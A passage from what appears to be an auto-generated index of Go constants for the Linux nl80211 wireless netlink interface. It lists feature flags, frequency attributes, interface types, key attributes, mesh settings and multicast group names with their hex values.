NL80211_EXT_FEATURE_UNSOL_BCAST_PROBE_RESP = 0x35 constant NL80211_EXT_FEATURE_VHT_IBSS (line 5151) | NL80211_EXT_FEATURE_VHT_IBSS = 0x0 constant NL80211_EXT_FEATURE_VLAN_OFFLOAD (line 5152) | NL80211_EXT_FEATURE_VLAN_OFFLOAD = 0x27 constant NL80211_FEATURE_ACKTO_ESTIMATION (line 5153) | NL80211_FEATURE_ACKTO_ESTIMATION = 0x800000 constant NL80211_FEATURE_ACTIVE_MONITOR (line 5154) | NL80211_FEATURE_ACTIVE_MONITOR = 0x20000 constant NL80211_FEATURE_ADVERTISE_CHAN_LIMITS (line 5155) | NL80211_FEATURE_ADVERTISE_CHAN_LIMITS = 0x4000 constant NL80211_FEATURE_AP_MODE_CHAN_WIDTH_CHANGE (line 5156) | NL80211_FEATURE_AP_MODE_CHAN_WIDTH_CHANGE = 0x40000 constant NL80211_FEATURE_AP_SCAN (line 5157) | NL80211_FEATURE_AP_SCAN = 0x100 constant NL80211_FEATURE_CELL_BASE_REG_HINTS (line 5158) | NL80211_FEATURE_CELL_BASE_REG_HINTS = 0x8 constant NL80211_FEATURE_DS_PARAM_SET_IE_IN_PROBES (line 5159) | NL80211_FEATURE_DS_PARAM_SET_IE_IN_PROBES = 0x80000 constant NL80211_FEATURE_DYNAMIC_SMPS (line 5160) | NL80211_FEATURE_DYNAMIC_SMPS = 0x2000000 constant NL80211_FEATURE_FULL_AP_CLIENT_STATE (line 5161) | NL80211_FEATURE_FULL_AP_CLIENT_STATE = 0x8000 constant NL80211_FEATURE_HT_IBSS (line 5162) | NL80211_FEATURE_HT_IBSS = 0x2 constant NL80211_FEATURE_INACTIVITY_TIMER (line 5163) | NL80211_FEATURE_INACTIVITY_TIMER = 0x4 constant NL80211_FEATURE_LOW_PRIORITY_SCAN (line 5164) | NL80211_FEATURE_LOW_PRIORITY_SCAN = 0x40 constant NL80211_FEATURE_MAC_ON_CREATE (line 5165) | NL80211_FEATURE_MAC_ON_CREATE = 0x8000000 constant NL80211_FEATURE_ND_RANDOM_MAC_ADDR (line 5166) | NL80211_FEATURE_ND_RANDOM_MAC_ADDR = 0x80000000 constant NL80211_FEATURE_NEED_OBSS_SCAN (line 5167) | NL80211_FEATURE_NEED_OBSS_SCAN = 0x400 constant NL80211_FEATURE_P2P_DEVICE_NEEDS_CHANNEL (line 5168) | NL80211_FEATURE_P2P_DEVICE_NEEDS_CHANNEL = 0x10 constant NL80211_FEATURE_P2P_GO_CTWIN (line 5169) | NL80211_FEATURE_P2P_GO_CTWIN = 0x800 constant NL80211_FEATURE_P2P_GO_OPPPS (line 5170) | NL80211_FEATURE_P2P_GO_OPPPS = 0x1000 constant NL80211_FEATURE_QUIET (line 5171) | NL80211_FEATURE_QUIET = 0x200000 constant NL80211_FEATURE_SAE (line 5172) | NL80211_FEATURE_SAE = 0x20 constant NL80211_FEATURE_SCAN_FLUSH (line 5173) | NL80211_FEATURE_SCAN_FLUSH = 0x80 constant NL80211_FEATURE_SCAN_RANDOM_MAC_ADDR (line 5174) | NL80211_FEATURE_SCAN_RANDOM_MAC_ADDR = 0x20000000 constant NL80211_FEATURE_SCHED_SCAN_RANDOM_MAC_ADDR (line 5175) | NL80211_FEATURE_SCHED_SCAN_RANDOM_MAC_ADDR = 0x40000000 constant NL80211_FEATURE_SK_TX_STATUS (line 5176) | NL80211_FEATURE_SK_TX_STATUS = 0x1 constant NL80211_FEATURE_STATIC_SMPS (line 5177) | NL80211_FEATURE_STATIC_SMPS = 0x1000000 constant NL80211_FEATURE_SUPPORTS_WMM_ADMISSION (line 5178) | NL80211_FEATURE_SUPPORTS_WMM_ADMISSION = 0x4000000 constant NL80211_FEATURE_TDLS_CHANNEL_SWITCH (line 5179) | NL80211_FEATURE_TDLS_CHANNEL_SWITCH = 0x10000000 constant NL80211_FEATURE_TX_POWER_INSERTION (line 5180) | NL80211_FEATURE_TX_POWER_INSERTION = 0x400000 constant NL80211_FEATURE_USERSPACE_MPM (line 5181) | NL80211_FEATURE_USERSPACE_MPM = 0x10000 constant NL80211_FEATURE_VIF_TXPOWER (line 5182) | NL80211_FEATURE_VIF_TXPOWER = 0x200 constant NL80211_FEATURE_WFA_TPC_IE_IN_PROBES (line 5183) | NL80211_FEATURE_WFA_TPC_IE_IN_PROBES = 0x100000 constant NL80211_FILS_DISCOVERY_ATTR_INT_MAX (line 5184) | NL80211_FILS_DISCOVERY_ATTR_INT_MAX = 0x2 constant NL80211_FILS_DISCOVERY_ATTR_INT_MIN (line 5185) | NL80211_FILS_DISCOVERY_ATTR_INT_MIN = 0x1 constant NL80211_FILS_DISCOVERY_ATTR_MAX (line 5186) | NL80211_FILS_DISCOVERY_ATTR_MAX = 0x3 constant NL80211_FILS_DISCOVERY_ATTR_TMPL (line 5187) | NL80211_FILS_DISCOVERY_ATTR_TMPL = 0x3 constant NL80211_FILS_DISCOVERY_TMPL_MIN_LEN (line 5188) | NL80211_FILS_DISCOVERY_TMPL_MIN_LEN = 0x2a constant NL80211_FREQUENCY_ATTR_16MHZ (line 5189) | NL80211_FREQUENCY_ATTR_16MHZ = 0x19 constant NL80211_FREQUENCY_ATTR_1MHZ (line 5190) | NL80211_FREQUENCY_ATTR_1MHZ = 0x15 constant NL80211_FREQUENCY_ATTR_2MHZ (line 5191) | NL80211_FREQUENCY_ATTR_2MHZ = 0x16 constant NL80211_FREQUENCY_ATTR_4MHZ (line 5192) | NL80211_FREQUENCY_ATTR_4MHZ = 0x17 constant NL80211_FREQUENCY_ATTR_8MHZ (line 5193) | NL80211_FREQUENCY_ATTR_8MHZ = 0x18 constant NL80211_FREQUENCY_ATTR_DFS_CAC_TIME (line 5194) | NL80211_FREQUENCY_ATTR_DFS_CAC_TIME = 0xd constant NL80211_FREQUENCY_ATTR_DFS_STATE (line 5195) | NL80211_FREQUENCY_ATTR_DFS_STATE = 0x7 constant NL80211_FREQUENCY_ATTR_DFS_TIME (line 5196) | NL80211_FREQUENCY_ATTR_DFS_TIME = 0x8 constant NL80211_FREQUENCY_ATTR_DISABLED (line 5197) | NL80211_FREQUENCY_ATTR_DISABLED = 0x2 constant NL80211_FREQUENCY_ATTR_FREQ (line 5198) | NL80211_FREQUENCY_ATTR_FREQ = 0x1 constant NL80211_FREQUENCY_ATTR_GO_CONCURRENT (line 5199) | NL80211_FREQUENCY_ATTR_GO_CONCURRENT = 0xf constant NL80211_FREQUENCY_ATTR_INDOOR_ONLY (line 5200) | NL80211_FREQUENCY_ATTR_INDOOR_ONLY = 0xe constant NL80211_FREQUENCY_ATTR_IR_CONCURRENT (line 5201) | NL80211_FREQUENCY_ATTR_IR_CONCURRENT = 0xf constant NL80211_FREQUENCY_ATTR_MAX (line 5202) | NL80211_FREQUENCY_ATTR_MAX = 0x1c constant NL80211_FREQUENCY_ATTR_MAX_TX_POWER (line 5203) | NL80211_FREQUENCY_ATTR_MAX_TX_POWER = 0x6 constant NL80211_FREQUENCY_ATTR_NO_10MHZ (line 5204) | NL80211_FREQUENCY_ATTR_NO_10MHZ = 0x11 constant NL80211_FREQUENCY_ATTR_NO_160MHZ (line 5205) | NL80211_FREQUENCY_ATTR_NO_160MHZ = 0xc constant NL80211_FREQUENCY_ATTR_NO_20MHZ (line 5206) | NL80211_FREQUENCY_ATTR_NO_20MHZ = 0x10 constant NL80211_FREQUENCY_ATTR_NO_320MHZ (line 5207) | NL80211_FREQUENCY_ATTR_NO_320MHZ = 0x1a constant NL80211_FREQUENCY_ATTR_NO_80MHZ (line 5208) | NL80211_FREQUENCY_ATTR_NO_80MHZ = 0xb constant NL80211_FREQUENCY_ATTR_NO_EHT (line 5209) | NL80211_FREQUENCY_ATTR_NO_EHT = 0x1b constant NL80211_FREQUENCY_ATTR_NO_HE (line 5210) | NL80211_FREQUENCY_ATTR_NO_HE = 0x13 constant NL80211_FREQUENCY_ATTR_NO_HT40_MINUS (line 5211) | NL80211_FREQUENCY_ATTR_NO_HT40_MINUS = 0x9 constant NL80211_FREQUENCY_ATTR_NO_HT40_PLUS (line 5212) | NL80211_FREQUENCY_ATTR_NO_HT40_PLUS = 0xa constant NL80211_FREQUENCY_ATTR_NO_IBSS (line 5213) | NL80211_FREQUENCY_ATTR_NO_IBSS = 0x3 constant NL80211_FREQUENCY_ATTR_NO_IR (line 5214) | NL80211_FREQUENCY_ATTR_NO_IR = 0x3 constant NL80211_FREQUENCY_ATTR_OFFSET (line 5215) | NL80211_FREQUENCY_ATTR_OFFSET = 0x14 constant NL80211_FREQUENCY_ATTR_PASSIVE_SCAN (line 5216) | NL80211_FREQUENCY_ATTR_PASSIVE_SCAN = 0x3 constant NL80211_FREQUENCY_ATTR_RADAR (line 5217) | NL80211_FREQUENCY_ATTR_RADAR = 0x5 constant NL80211_FREQUENCY_ATTR_WMM (line 5218) | NL80211_FREQUENCY_ATTR_WMM = 0x12 constant NL80211_FTM_RESP_ATTR_CIVICLOC (line 5219) | NL80211_FTM_RESP_ATTR_CIVICLOC = 0x3 constant NL80211_FTM_RESP_ATTR_ENABLED (line 5220) | NL80211_FTM_RESP_ATTR_ENABLED = 0x1 constant NL80211_FTM_RESP_ATTR_LCI (line 5221) | NL80211_FTM_RESP_ATTR_LCI = 0x2 constant NL80211_FTM_RESP_ATTR_MAX (line 5222) | NL80211_FTM_RESP_ATTR_MAX = 0x3 constant NL80211_FTM_STATS_ASAP_NUM (line 5223) | NL80211_FTM_STATS_ASAP_NUM = 0x4 constant NL80211_FTM_STATS_FAILED_NUM (line 5224) | NL80211_FTM_STATS_FAILED_NUM = 0x3 constant NL80211_FTM_STATS_MAX (line 5225) | NL80211_FTM_STATS_MAX = 0xa constant NL80211_FTM_STATS_NON_ASAP_NUM (line 5226) | NL80211_FTM_STATS_NON_ASAP_NUM = 0x5 constant NL80211_FTM_STATS_OUT_OF_WINDOW_TRIGGERS_NUM (line 5227) | NL80211_FTM_STATS_OUT_OF_WINDOW_TRIGGERS_NUM = 0x9 constant NL80211_FTM_STATS_PAD (line 5228) | NL80211_FTM_STATS_PAD = 0xa constant NL80211_FTM_STATS_PARTIAL_NUM (line 5229) | NL80211_FTM_STATS_PARTIAL_NUM = 0x2 constant NL80211_FTM_STATS_RESCHEDULE_REQUESTS_NUM (line 5230) | NL80211_FTM_STATS_RESCHEDULE_REQUESTS_NUM = 0x8 constant NL80211_FTM_STATS_SUCCESS_NUM (line 5231) | NL80211_FTM_STATS_SUCCESS_NUM = 0x1 constant NL80211_FTM_STATS_TOTAL_DURATION_MSEC (line 5232) | NL80211_FTM_STATS_TOTAL_DURATION_MSEC = 0x6 constant NL80211_FTM_STATS_UNKNOWN_TRIGGERS_NUM (line 5233) | NL80211_FTM_STATS_UNKNOWN_TRIGGERS_NUM = 0x7 constant NL80211_GENL_NAME (line 5234) | NL80211_GENL_NAME = "nl80211" constant NL80211_HE_BSS_COLOR_ATTR_COLOR (line 5235) | NL80211_HE_BSS_COLOR_ATTR_COLOR = 0x1 constant NL80211_HE_BSS_COLOR_ATTR_DISABLED (line 5236) | NL80211_HE_BSS_COLOR_ATTR_DISABLED = 0x2 constant NL80211_HE_BSS_COLOR_ATTR_MAX (line 5237) | NL80211_HE_BSS_COLOR_ATTR_MAX = 0x3 constant NL80211_HE_BSS_COLOR_ATTR_PARTIAL (line 5238) | NL80211_HE_BSS_COLOR_ATTR_PARTIAL = 0x3 constant NL80211_HE_MAX_CAPABILITY_LEN (line 5239) | NL80211_HE_MAX_CAPABILITY_LEN = 0x36 constant NL80211_HE_MIN_CAPABILITY_LEN (line 5240) | NL80211_HE_MIN_CAPABILITY_LEN = 0x10 constant NL80211_HE_NSS_MAX (line 5241) | NL80211_HE_NSS_MAX = 0x8 constant NL80211_HE_OBSS_PD_ATTR_BSS_COLOR_BITMAP (line 5242) | NL80211_HE_OBSS_PD_ATTR_BSS_COLOR_BITMAP = 0x4 constant NL80211_HE_OBSS_PD_ATTR_MAX (line 5243) | NL80211_HE_OBSS_PD_ATTR_MAX = 0x6 constant NL80211_HE_OBSS_PD_ATTR_MAX_OFFSET (line 5244) | NL80211_HE_OBSS_PD_ATTR_MAX_OFFSET = 0x2 constant NL80211_HE_OBSS_PD_ATTR_MIN_OFFSET (line 5245) | NL80211_HE_OBSS_PD_ATTR_MIN_OFFSET = 0x1 constant NL80211_HE_OBSS_PD_ATTR_NON_SRG_MAX_OFFSET (line 5246) | NL80211_HE_OBSS_PD_ATTR_NON_SRG_MAX_OFFSET = 0x3 constant NL80211_HE_OBSS_PD_ATTR_PARTIAL_BSSID_BITMAP (line 5247) | NL80211_HE_OBSS_PD_ATTR_PARTIAL_BSSID_BITMAP = 0x5 constant NL80211_HE_OBSS_PD_ATTR_SR_CTRL (line 5248) | NL80211_HE_OBSS_PD_ATTR_SR_CTRL = 0x6 constant NL80211_HIDDEN_SSID_NOT_IN_USE (line 5249) | NL80211_HIDDEN_SSID_NOT_IN_USE = 0x0 constant NL80211_HIDDEN_SSID_ZERO_CONTENTS (line 5250) | NL80211_HIDDEN_SSID_ZERO_CONTENTS = 0x2 constant NL80211_HIDDEN_SSID_ZERO_LEN (line 5251) | NL80211_HIDDEN_SSID_ZERO_LEN = 0x1 constant NL80211_HT_CAPABILITY_LEN (line 5252) | NL80211_HT_CAPABILITY_LEN = 0x1a constant NL80211_IFACE_COMB_BI_MIN_GCD (line 5253) | NL80211_IFACE_COMB_BI_MIN_GCD = 0x7 constant NL80211_IFACE_COMB_LIMITS (line 5254) | NL80211_IFACE_COMB_LIMITS = 0x1 constant NL80211_IFACE_COMB_MAXNUM (line 5255) | NL80211_IFACE_COMB_MAXNUM = 0x2 constant NL80211_IFACE_COMB_NUM_CHANNELS (line 5256) | NL80211_IFACE_COMB_NUM_CHANNELS = 0x4 constant NL80211_IFACE_COMB_RADAR_DETECT_REGIONS (line 5257) | NL80211_IFACE_COMB_RADAR_DETECT_REGIONS = 0x6 constant NL80211_IFACE_COMB_RADAR_DETECT_WIDTHS (line 5258) | NL80211_IFACE_COMB_RADAR_DETECT_WIDTHS = 0x5 constant NL80211_IFACE_COMB_STA_AP_BI_MATCH (line 5259) | NL80211_IFACE_COMB_STA_AP_BI_MATCH = 0x3 constant NL80211_IFACE_COMB_UNSPEC (line 5260) | NL80211_IFACE_COMB_UNSPEC = 0x0 constant NL80211_IFACE_LIMIT_MAX (line 5261) | NL80211_IFACE_LIMIT_MAX = 0x1 constant NL80211_IFACE_LIMIT_TYPES (line 5262) | NL80211_IFACE_LIMIT_TYPES = 0x2 constant NL80211_IFACE_LIMIT_UNSPEC (line 5263) | NL80211_IFACE_LIMIT_UNSPEC = 0x0 constant NL80211_IFTYPE_ADHOC (line 5264) | NL80211_IFTYPE_ADHOC = 0x1 constant NL80211_IFTYPE_AKM_ATTR_IFTYPES (line 5265) | NL80211_IFTYPE_AKM_ATTR_IFTYPES = 0x1 constant NL80211_IFTYPE_AKM_ATTR_MAX (line 5266) | NL80211_IFTYPE_AKM_ATTR_MAX = 0x2 constant NL80211_IFTYPE_AKM_ATTR_SUITES (line 5267) | NL80211_IFTYPE_AKM_ATTR_SUITES = 0x2 constant NL80211_IFTYPE_AP (line 5268) | NL80211_IFTYPE_AP = 0x3 constant NL80211_IFTYPE_AP_VLAN (line 5269) | NL80211_IFTYPE_AP_VLAN = 0x4 constant NL80211_IFTYPE_MAX (line 5270) | NL80211_IFTYPE_MAX = 0xc constant NL80211_IFTYPE_MESH_POINT (line 5271) | NL80211_IFTYPE_MESH_POINT = 0x7 constant NL80211_IFTYPE_MONITOR (line 5272) | NL80211_IFTYPE_MONITOR = 0x6 constant NL80211_IFTYPE_NAN (line 5273) | NL80211_IFTYPE_NAN = 0xc constant NL80211_IFTYPE_OCB (line 5274) | NL80211_IFTYPE_OCB = 0xb constant NL80211_IFTYPE_P2P_CLIENT (line 5275) | NL80211_IFTYPE_P2P_CLIENT = 0x8 constant NL80211_IFTYPE_P2P_DEVICE (line 5276) | NL80211_IFTYPE_P2P_DEVICE = 0xa constant NL80211_IFTYPE_P2P_GO (line 5277) | NL80211_IFTYPE_P2P_GO = 0x9 constant NL80211_IFTYPE_STATION (line 5278) | NL80211_IFTYPE_STATION = 0x2 constant NL80211_IFTYPE_UNSPECIFIED (line 5279) | NL80211_IFTYPE_UNSPECIFIED = 0x0 constant NL80211_IFTYPE_WDS (line 5280) | NL80211_IFTYPE_WDS = 0x5 constant NL80211_KCK_EXT_LEN (line 5281) | NL80211_KCK_EXT_LEN = 0x18 constant NL80211_KCK_LEN (line 5282) | NL80211_KCK_LEN = 0x10 constant NL80211_KEK_EXT_LEN (line 5283) | NL80211_KEK_EXT_LEN = 0x20 constant NL80211_KEK_LEN (line 5284) | NL80211_KEK_LEN = 0x10 constant NL80211_KEY_CIPHER (line 5285) | NL80211_KEY_CIPHER = 0x3 constant NL80211_KEY_DATA (line 5286) | NL80211_KEY_DATA = 0x1 constant NL80211_KEY_DEFAULT_BEACON (line 5287) | NL80211_KEY_DEFAULT_BEACON = 0xa constant NL80211_KEY_DEFAULT (line 5288) | NL80211_KEY_DEFAULT = 0x5 constant NL80211_KEY_DEFAULT_MGMT (line 5289) | NL80211_KEY_DEFAULT_MGMT = 0x6 constant NL80211_KEY_DEFAULT_TYPE_MULTICAST (line 5290) | NL80211_KEY_DEFAULT_TYPE_MULTICAST = 0x2 constant NL80211_KEY_DEFAULT_TYPES (line 5291) | NL80211_KEY_DEFAULT_TYPES = 0x8 constant NL80211_KEY_DEFAULT_TYPE_UNICAST (line 5292) | NL80211_KEY_DEFAULT_TYPE_UNICAST = 0x1 constant NL80211_KEY_IDX (line 5293) | NL80211_KEY_IDX = 0x2 constant NL80211_KEY_MAX (line 5294) | NL80211_KEY_MAX = 0xa constant NL80211_KEY_MODE (line 5295) | NL80211_KEY_MODE = 0x9 constant NL80211_KEY_NO_TX (line 5296) | NL80211_KEY_NO_TX = 0x1 constant NL80211_KEY_RX_TX (line 5297) | NL80211_KEY_RX_TX = 0x0 constant NL80211_KEY_SEQ (line 5298) | NL80211_KEY_SEQ = 0x4 constant NL80211_KEY_SET_TX (line 5299) | NL80211_KEY_SET_TX = 0x2 constant NL80211_KEY_TYPE (line 5300) | NL80211_KEY_TYPE = 0x7 constant NL80211_KEYTYPE_GROUP (line 5301) | NL80211_KEYTYPE_GROUP = 0x0 constant NL80211_KEYTYPE_PAIRWISE (line 5302) | NL80211_KEYTYPE_PAIRWISE = 0x1 constant NL80211_KEYTYPE_PEERKEY (line 5303) | NL80211_KEYTYPE_PEERKEY = 0x2 constant NL80211_MAX_NR_AKM_SUITES (line 5304) | NL80211_MAX_NR_AKM_SUITES = 0x2 constant NL80211_MAX_NR_CIPHER_SUITES (line 5305) | NL80211_MAX_NR_CIPHER_SUITES = 0x5 constant NL80211_MAX_SUPP_HT_RATES (line 5306) | NL80211_MAX_SUPP_HT_RATES = 0x4d constant NL80211_MAX_SUPP_RATES (line 5307) | NL80211_MAX_SUPP_RATES = 0x20 constant NL80211_MAX_SUPP_REG_RULES (line 5308) | NL80211_MAX_SUPP_REG_RULES = 0x80 constant NL80211_MBSSID_CONFIG_ATTR_EMA (line 5309) | NL80211_MBSSID_CONFIG_ATTR_EMA = 0x5 constant NL80211_MBSSID_CONFIG_ATTR_INDEX (line 5310) | NL80211_MBSSID_CONFIG_ATTR_INDEX = 0x3 constant NL80211_MBSSID_CONFIG_ATTR_MAX (line 5311) | NL80211_MBSSID_CONFIG_ATTR_MAX = 0x5 constant NL80211_MBSSID_CONFIG_ATTR_MAX_EMA_PROFILE_PERIODICITY (line 5312) | NL80211_MBSSID_CONFIG_ATTR_MAX_EMA_PROFILE_PERIODICITY = 0x2 constant NL80211_MBSSID_CONFIG_ATTR_MAX_INTERFACES (line 5313) | NL80211_MBSSID_CONFIG_ATTR_MAX_INTERFACES = 0x1 constant NL80211_MBSSID_CONFIG_ATTR_TX_IFINDEX (line 5314) | NL80211_MBSSID_CONFIG_ATTR_TX_IFINDEX = 0x4 constant NL80211_MESHCONF_ATTR_MAX (line 5315) | NL80211_MESHCONF_ATTR_MAX = 0x1f constant NL80211_MESHCONF_AUTO_OPEN_PLINKS (line 5316) | NL80211_MESHCONF_AUTO_OPEN_PLINKS = 0x7 constant NL80211_MESHCONF_AWAKE_WINDOW (line 5317) | NL80211_MESHCONF_AWAKE_WINDOW = 0x1b constant NL80211_MESHCONF_CONFIRM_TIMEOUT (line 5318) | NL80211_MESHCONF_CONFIRM_TIMEOUT = 0x2 constant NL80211_MESHCONF_CONNECTED_TO_AS (line 5319) | NL80211_MESHCONF_CONNECTED_TO_AS = 0x1f constant NL80211_MESHCONF_CONNECTED_TO_GATE (line 5320) | NL80211_MESHCONF_CONNECTED_TO_GATE = 0x1d constant NL80211_MESHCONF_ELEMENT_TTL (line 5321) | NL80211_MESHCONF_ELEMENT_TTL = 0xf constant NL80211_MESHCONF_FORWARDING (line 5322) | NL80211_MESHCONF_FORWARDING = 0x13 constant NL80211_MESHCONF_GATE_ANNOUNCEMENTS (line 5323) | NL80211_MESHCONF_GATE_ANNOUNCEMENTS = 0x11 constant NL80211_MESHCONF_HOLDING_TIMEOUT (line 5324) | NL80211_MESHCONF_HOLDING_TIMEOUT = 0x3 constant NL80211_MESHCONF_HT_OPMODE (line 5325) | NL80211_MESHCONF_HT_OPMODE = 0x16 constant NL80211_MESHCONF_HWMP_ACTIVE_PATH_TIMEOUT (line 5326) | NL80211_MESHCONF_HWMP_ACTIVE_PATH_TIMEOUT = 0xb constant NL80211_MESHCONF_HWMP_CONFIRMATION_INTERVAL (line 5327) | NL80211_MESHCONF_HWMP_CONFIRMATION_INTERVAL = 0x19 constant NL80211_MESHCONF_HWMP_MAX_PREQ_RETRIES (line 5328) | NL80211_MESHCONF_HWMP_MAX_PREQ_RETRIES = 0x8 constant NL80211_MESHCONF_HWMP_NET_DIAM_TRVS_TIME (line 5329) | NL80211_MESHCONF_HWMP_NET_DIAM_TRVS_TIME = 0xd constant NL80211_MESHCONF_HWMP_PATH_TO_ROOT_TIMEOUT (line 5330) | NL80211_MESHCONF_HWMP_PATH_TO_ROOT_TIMEOUT = 0x17 constant NL80211_MESHCONF_HWMP_PERR_MIN_INTERVAL (line 5331) | NL80211_MESHCONF_HWMP_PERR_MIN_INTERVAL = 0x12 constant NL80211_MESHCONF_HWMP_PREQ_MIN_INTERVAL (line 5332) | NL80211_MESHCONF_HWMP_PREQ_MIN_INTERVAL = 0xc constant NL80211_MESHCONF_HWMP_RANN_INTERVAL (line 5333) | NL80211_MESHCONF_HWMP_RANN_INTERVAL = 0x10 constant NL80211_MESHCONF_HWMP_ROOT_INTERVAL (line 5334) | NL80211_MESHCONF_HWMP_ROOT_INTERVAL = 0x18 constant NL80211_MESHCONF_HWMP_ROOTMODE (line 5335) | NL80211_MESHCONF_HWMP_ROOTMODE = 0xe constant NL80211_MESHCONF_MAX_PEER_LINKS (line 5336) | NL80211_MESHCONF_MAX_PEER_LINKS = 0x4 constant NL80211_MESHCONF_MAX_RETRIES (line 5337) | NL80211_MESHCONF_MAX_RETRIES = 0x5 constant NL80211_MESHCONF_MIN_DISCOVERY_TIMEOUT (line 5338) | NL80211_MESHCONF_MIN_DISCOVERY_TIMEOUT = 0xa constant NL80211_MESHCONF_NOLEARN (line 5339) | NL80211_MESHCONF_NOLEARN = 0x1e constant NL80211_MESHCONF_PATH_REFRESH_TIME (line 5340) | NL80211_MESHCONF_PATH_REFRESH_TIME = 0x9 constant NL80211_MESHCONF_PLINK_TIMEOUT (line 5341) | NL80211_MESHCONF_PLINK_TIMEOUT = 0x1c constant NL80211_MESHCONF_POWER_MODE (line 5342) | NL80211_MESHCONF_POWER_MODE = 0x1a constant NL80211_MESHCONF_RETRY_TIMEOUT (line 5343) | NL80211_MESHCONF_RETRY_TIMEOUT = 0x1 constant NL80211_MESHCONF_RSSI_THRESHOLD (line 5344) | NL80211_MESHCONF_RSSI_THRESHOLD = 0x14 constant NL80211_MESHCONF_SYNC_OFFSET_MAX_NEIGHBOR (line 5345) | NL80211_MESHCONF_SYNC_OFFSET_MAX_NEIGHBOR = 0x15 constant NL80211_MESHCONF_TTL (line 5346) | NL80211_MESHCONF_TTL = 0x6 constant NL80211_MESH_POWER_ACTIVE (line 5347) | NL80211_MESH_POWER_ACTIVE = 0x1 constant NL80211_MESH_POWER_DEEP_SLEEP (line 5348) | NL80211_MESH_POWER_DEEP_SLEEP = 0x3 constant NL80211_MESH_POWER_LIGHT_SLEEP (line 5349) | NL80211_MESH_POWER_LIGHT_SLEEP = 0x2 constant NL80211_MESH_POWER_MAX (line 5350) | NL80211_MESH_POWER_MAX = 0x3 constant NL80211_MESH_POWER_UNKNOWN (line 5351) | NL80211_MESH_POWER_UNKNOWN = 0x0 constant NL80211_MESH_SETUP_ATTR_MAX (line 5352) | NL80211_MESH_SETUP_ATTR_MAX = 0x8 constant NL80211_MESH_SETUP_AUTH_PROTOCOL (line 5353) | NL80211_MESH_SETUP_AUTH_PROTOCOL = 0x8 constant NL80211_MESH_SETUP_ENABLE_VENDOR_METRIC (line 5354) | NL80211_MESH_SETUP_ENABLE_VENDOR_METRIC = 0x2 constant NL80211_MESH_SETUP_ENABLE_VENDOR_PATH_SEL (line 5355) | NL80211_MESH_SETUP_ENABLE_VENDOR_PATH_SEL = 0x1 constant NL80211_MESH_SETUP_ENABLE_VENDOR_SYNC (line 5356) | NL80211_MESH_SETUP_ENABLE_VENDOR_SYNC = 0x6 constant NL80211_MESH_SETUP_IE (line 5357) | NL80211_MESH_SETUP_IE = 0x3 constant NL80211_MESH_SETUP_USERSPACE_AMPE (line 5358) | NL80211_MESH_SETUP_USERSPACE_AMPE = 0x5 constant NL80211_MESH_SETUP_USERSPACE_AUTH (line 5359) | NL80211_MESH_SETUP_USERSPACE_AUTH = 0x4 constant NL80211_MESH_SETUP_USERSPACE_MPM (line 5360) | NL80211_MESH_SETUP_USERSPACE_MPM = 0x7 constant NL80211_MESH_SETUP_VENDOR_PATH_SEL_IE (line 5361) | NL80211_MESH_SETUP_VENDOR_PATH_SEL_IE = 0x3 constant NL80211_MFP_NO (line 5362) | NL80211_MFP_NO = 0x0 constant NL80211_MFP_OPTIONAL (line 5363) | NL80211_MFP_OPTIONAL = 0x2 constant NL80211_MFP_REQUIRED (line 5364) | NL80211_MFP_REQUIRED = 0x1 constant NL80211_MIN_REMAIN_ON_CHANNEL_TIME (line 5365) | NL80211_MIN_REMAIN_ON_CHANNEL_TIME = 0xa constant NL80211_MNTR_FLAG_ACTIVE (line 5366) | NL80211_MNTR_FLAG_ACTIVE = 0x6 constant NL80211_MNTR_FLAG_CONTROL (line 5367) | NL80211_MNTR_FLAG_CONTROL = 0x3 constant NL80211_MNTR_FLAG_COOK_FRAMES (line 5368) | NL80211_MNTR_FLAG_COOK_FRAMES = 0x5 constant NL80211_MNTR_FLAG_FCSFAIL (line 5369) | NL80211_MNTR_FLAG_FCSFAIL = 0x1 constant NL80211_MNTR_FLAG_MAX (line 5370) | NL80211_MNTR_FLAG_MAX = 0x6 constant NL80211_MNTR_FLAG_OTHER_BSS (line 5371) | NL80211_MNTR_FLAG_OTHER_BSS = 0x4 constant NL80211_MNTR_FLAG_PLCPFAIL (line 5372) | NL80211_MNTR_FLAG_PLCPFAIL = 0x2 constant NL80211_MPATH_FLAG_ACTIVE (line 5373) | NL80211_MPATH_FLAG_ACTIVE = 0x1 constant NL80211_MPATH_FLAG_FIXED (line 5374) | NL80211_MPATH_FLAG_FIXED = 0x8 constant NL80211_MPATH_FLAG_RESOLVED (line 5375) | NL80211_MPATH_FLAG_RESOLVED = 0x10 constant NL80211_MPATH_FLAG_RESOLVING (line 5376) | NL80211_MPATH_FLAG_RESOLVING = 0x2 constant NL80211_MPATH_FLAG_SN_VALID (line 5377) | NL80211_MPATH_FLAG_SN_VALID = 0x4 constant NL80211_MPATH_INFO_DISCOVERY_RETRIES (line 5378) | NL80211_MPATH_INFO_DISCOVERY_RETRIES = 0x7 constant NL80211_MPATH_INFO_DISCOVERY_TIMEOUT (line 5379) | NL80211_MPATH_INFO_DISCOVERY_TIMEOUT = 0x6 constant NL80211_MPATH_INFO_EXPTIME (line 5380) | NL80211_MPATH_INFO_EXPTIME = 0x4 constant NL80211_MPATH_INFO_FLAGS (line 5381) | NL80211_MPATH_INFO_FLAGS = 0x5 constant NL80211_MPATH_INFO_FRAME_QLEN (line 5382) | NL80211_MPATH_INFO_FRAME_QLEN = 0x1 constant NL80211_MPATH_INFO_HOP_COUNT (line 5383) | NL80211_MPATH_INFO_HOP_COUNT = 0x8 constant NL80211_MPATH_INFO_MAX (line 5384) | NL80211_MPATH_INFO_MAX = 0x9 constant NL80211_MPATH_INFO_METRIC (line 5385) | NL80211_MPATH_INFO_METRIC = 0x3 constant NL80211_MPATH_INFO_PATH_CHANGE (line 5386) | NL80211_MPATH_INFO_PATH_CHANGE = 0x9 constant NL80211_MPATH_INFO_SN (line 5387) | NL80211_MPATH_INFO_SN = 0x2 constant NL80211_MULTICAST_GROUP_CONFIG (line 5388) | NL80211_MULTICAST_GROUP_CONFIG = "config" constant NL80211_MULTICAST_GROUP_MLME (line 5389) | NL80211_MULTICAST_GROUP_MLME = "mlme" constant NL80211_MULTICAST_GROUP_NAN (line 5390) | NL80211_MULTICAST_GROUP_NAN = "nan" constant NL80211_MULTICAST_GROUP_REG (line 5391) | NL80211_MULTICAST_GROUP_REG = "regulatory" constant NL80211_MULTICAST_GROUP_SCAN (line 5392) | NL80211_MULTICAST_GROUP_SCAN = "scan" constant NL80211_MULTICAST_GROUP_TESTMODE (line 5393) | NL80211_MULTICAST_GROUP_TESTMODE = "testmode" constant NL80211_MULTICAST_GROUP_VENDOR (line 5394) | 